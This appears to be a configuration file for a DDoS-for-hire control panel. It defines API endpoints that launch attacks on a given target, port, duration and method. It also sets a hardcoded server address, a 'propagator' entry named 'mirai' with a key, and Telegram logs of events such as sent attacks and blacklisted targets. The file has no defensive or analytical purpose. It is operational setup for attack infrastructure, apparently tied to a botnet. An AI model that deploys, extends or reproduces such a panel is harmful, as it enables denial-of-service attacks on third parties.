[web]
# Endpoints
# /                                                                                            Login
# /api/{key}/attack?target=<<$target>>&port=<<$port>>&duration=<<$time>>&method=<<$method>>    Launch attacks
# /api/{key}/methods                                                                           Lists methods
# /api/{key}/propagator/{propagator_key}?value=<<$value>>                                      Propagate values

# Example
# http://localhost:3000/api/39487/methods
# http://127.0.0.1:3000/api/39487/methods
enabled=true
address="103.174.73.85"
port=3000

[web.ssl]
enabled=true
cert="./assets/cert.pem"
key="./assets/key.pem"

[web.propagator]
enabled=false
# make a new slice inside this array and define a name, then inside swash you can do <<prop("mirai")>> (replace "mirai" with your defined name)
key=[{name="mirai", key="bDdgVI7Pz1IMRJyj"}]

[web.telegram]
enabled=false
token="<your_token>"

# implementation of telegram logs
[web.telegram.logs]
enabled=false
log_roles=["admin"]
triggers=[
        "login_success",
        "user_banned",
        "user_unbanned",
        "user_edited",
        "user_removed",
        "user_created",
        "attack_max_conns",
        "attack_cooldown_enabled",
        "attack_powersaving_enabled",
        "attack_sent",
        "attack_failed",
        "attack_target_blacklisted",
]